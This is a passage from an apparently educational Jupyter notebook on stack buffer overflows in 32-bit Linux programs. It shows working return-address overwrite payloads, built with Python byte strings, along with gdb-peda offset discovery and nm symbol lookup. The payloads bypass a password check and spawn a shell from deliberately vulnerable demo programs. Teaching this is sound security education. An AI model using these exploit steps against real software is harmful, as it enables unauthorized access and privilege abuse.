0804c030 D __TMC_END__
080493f2 T __x86.get_pc_th

In [22]:
# how about **valid** function?!
# must use: sys.stdout.buffer.write to print memory addresses and binary data!
! ./auth_overflow3.exe $(python3 -c 'import sys; sys.stdout.buffer.write(b"A"*28 + b"\xB2\x91\x04\x08")')


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


- we forced the execution flow of the program to return to **valid()** and execute it instead of the **invalid()** for wrong password!

## One more example

- let's look at the stack_overflow_stdio.cpp program that has a `give_shell()` function that's not called anywhere in the program
- when bad function is done executing, the program should execute cout statement in **main()** printing 'Good bye!' on the console
- since, **bad()** has overflow vulnerability, we can overflow **buffer** and overwrite the caller's return address with the address of **give_shell()**
- let's try to exploit the program to execute **give_shell()**

In [23]:
! cat ./demos/stack_overflow_stdio.cpp

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <iostream>
using namespace std;

#define BUFSIZE 128

using namespace std;

void give_shell(){
    // Set the gid to the effective gid
    // this prevents /bin/sh from dropping the privileges
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh");
}

char * mgets(char *dst) {
    char *ptr = dst;
    int ch; 
	/* skip leading white spaces */ 
    while ((ch = getchar()) && (ch == ' ' or ch == '\t') )
        ; 

    if ((ch == '\n') or (ch == EOF)) { 
        *ptr = '\0';
        return dst; 
    } 
    else
        *ptr = ch;

    /* now read the rest until \n or EOF */ 
    while (true) {
        ch = getchar();
        if (ch == '\n' or ch == EOF) break;
        *(++ptr) = ch; 
    }
    *(++ptr) = 0;
    return dst;
}

void bad() {
    char buffer[BUFSIZE];
    printf("buffer is at %p\n", buffer);
    cout << "Give me some text: ";
    fflush(stdou

 - let's compile the program and execute it
 - recall that the buffer's address doesn't change as long as the program name length is not changed and no argument is passed to the program

In [24]:
! ./compile.sh ./demos/stack_overflow_stdio.cpp stack_overflow_stdio.exe

In [25]:
! python -c 'print("Hello World!")' | ./stack_overflow_stdio.exe

buffer is at 0xffffc2d0
Give me some text: Acknowledged: Hello World!
Good bye!


### steps to exploit the stack_overflow_stdio.exe to give_shell

1. find the offset of the return address with respective to the buffer
2. find the address of give_shell symbol
3. send junk of offset length and the address of give_shell() to return to it
4. and voila!

#### step1: find the offset
- we'll use gdb-peda's cyclic pattern for this as shown below

```bash
(base) kali@kali:~/projects/Hacking-CPP-Notebooks$ gdb -q stack_overflow_stdio.exe
Reading symbols from stack_overflow_stdio.exe...
```
- let's create a pattern of 200 bytes (long enough) to overwrite the caller's return address and store it to a file
- since, the program gets the data interactively via std I/O, we'll pipe the data from the file when executing the program

```bash
gdb-peda$ pattern create 200 pattern.txt
Writing pattern of 200 chars to filename "pattern.txt"

gdb-peda$ run < pattern.txt
Starting program: /home/kali/projects/Hacking-CPP-Notebooks/stack_overflow_stdio.exe < pattern.txt
buffer is at 0xffffc300
Give me some text: buffer contains: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
size of buffer = 128 and length is 200

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x27 ("'")
EBX: 0x6c414150 ('PAAl')
ECX: 0x0 
EDX: 0x1 
ESI: 0xf7de6000 --> 0x1e4d6c 
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0x41514141 ('AAQA')
ESP: 0xffffc390 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41416d41 ('AmAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41416d41
[------------------------------------stack-------------------------------------]
0000| 0xffffc390 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0004| 0xffffc394 ("AASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0008| 0xffffc398 ("ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0012| 0xffffc39c ("TAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0016| 0xffffc3a0 ("AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0020| 0xffffc3a4 ("ArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0024| 0xffffc3a8 ("VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0028| 0xffffc3ac ("AAWAAuAAXAAvAAYAAwAAZAAxAAyA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41416d41 in ?? ()
```
- let's search for the offset using pattern search in registers

```bash
gdb-peda$ patts
Registers contain pattern buffer:
EBX+0 found at offset: 132
EBP+0 found at offset: 136
EIP+0 found at offset: 140  <-------- offset to the return address
Registers point to pattern buffer:
[ESP] --> offset 144 - size ~56
Pattern buffer found at:
0x08051bd7 : offset   22 - size  178 ([heap])
0x08051fc0 : offset    0 - size  200 ([heap])
0xf7c000cd : offset 33208 - size    4 (/usr/lib32/libm-2.31.so)
0xffffc300 : offset    0 - size  200 ($sp + -0x90 [-36 dwords])
References to pattern buffer found at:
0xf7de6584 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6588 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de658c : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6590 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6594 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6598 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de659c : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7e62d1c : 0xffffc300 (/usr/lib32/libstdc++.so.6.0.28)
0xffffc2e0 : 0xffffc300 ($sp + -0xb0 [-44 dwords])

```
- so, the caller's return address is **140** bytes away from the buffer

#### step 2: find the address of give_shell()
- we'll use **nm** command to find the address of symbols

```bash
(base) kali@kali:~/projects/EthicalHacking-Notebooks$ nm stack_overflow_stdio.exe
0804c040 B __bss_start
0804c040 b completed.0
         U __cxa_atexit@@GLIBC_2.1.3
0804c038 D __data_start
0804c038 W data_start
08049140 t deregister_tm_clones
08049120 T _dl_relocate_static_pie
080491c0 t __do_global_dtors_aux
0804bef8 d __do_global_dtors_aux_fini_array_entry
0804c03c D __dso_handle
0804befc d _DYNAMIC
0804c040 D _edata
0804c044 B _end
         U fflush@@GLIBC_2.0
080494d8 T _fini
0804a000 R _fp_hw
080491f0 t frame_dummy
0804bef0 d __frame_dummy_init_array_entry
0804a2ac r __FRAME_END__
         U getchar@@GLIBC_2.0
         U getegid@@GLIBC_2.0
0804c000 d _GLOBAL_OFFSET_TABLE_
08049444 t _GLOBAL__sub_I__Z10give_shellv
         w __gmon_start__
0804a050 r __GNU_EH_FRAME_HDR
08049000 T _init
0804bef8 d __init_array_end
0804bef0 d __init_array_start
0804a004 R _IO_stdin_used
080494d0 T __libc_csu_fini
08049470 T __libc_csu_init
         U __libc_start_main@@GLIBC_2.0
08049385 T main
         U printf@@GLIBC_2.0
08049180 t register_tm_clones
         U setresgid@@GLIBC_2.0
080490e0 T _start
         U stdout@@GLIBC_2.0
         U system@@GLIBC_2.0
0804c040 D __TMC_END__
08049468 T __x86.get_pc_thunk.ax
080494d1 T __x86.get_pc_thunk.bp
08049130 T __x86.get_pc_thunk.bx
080491f2 T _Z10give_shellv   <------------------- !!!!!!!address of give_shell()!!!!!!
080492d3 T _Z3badv
080493eb t _Z41__static_initialization_and_destruction_0ii
08049238 T _Z5mgetsPc
         U _ZNSolsEPFRSoS_E@@GLIBCXX_3.4
         U _ZNSt8ios_base4InitC1Ev@@GLIBCXX_3.4
         U _ZNSt8ios_base4InitD1Ev@@GLIBCXX_3.4
         U _ZSt4cout@@GLIBCXX_3.4
         U _ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_@@GLIBCXX_3.4
0804a008 r _ZStL19piecewise_construct
0804c041 b _ZStL8__ioinit
         U _ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc@@GLIBCXX_3.4
```

- look for a line that looks something like: 080491f2 T _Z10give_shellv
- the first column is the address of the symbols when the program is loaded in memory for execution
- now let's create the payload of 140 JUNK + [little endian address of give_shell] and send it to the program as shown below
- caveat: since the program takes data from STD IO, we need to create and store the payload into a file
- then pipe the contents of the payload, so we can get the interactive shell!
- also note `-` hyphen after cat is required to get the interactive shell

```bash
(base) kali@kali:~/projects/Hacking-CPP-Notebooks$ python -c 'import sys; sys.stdout.buffer.write(b"A"*140 + b"\xf2\x91\x04\x08")' > payload.bin

(base) kali@kali:~/projects/EthicalHacking-Notebooks$ cat payload.bin - | ./stack_overflow_stdio.exe 
buffer is at 0xffffc320
Give me some text: 
Acknowledged: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��
whoami
kali
date
Tue 15 Dec 2020 05:34:30 PM EST

```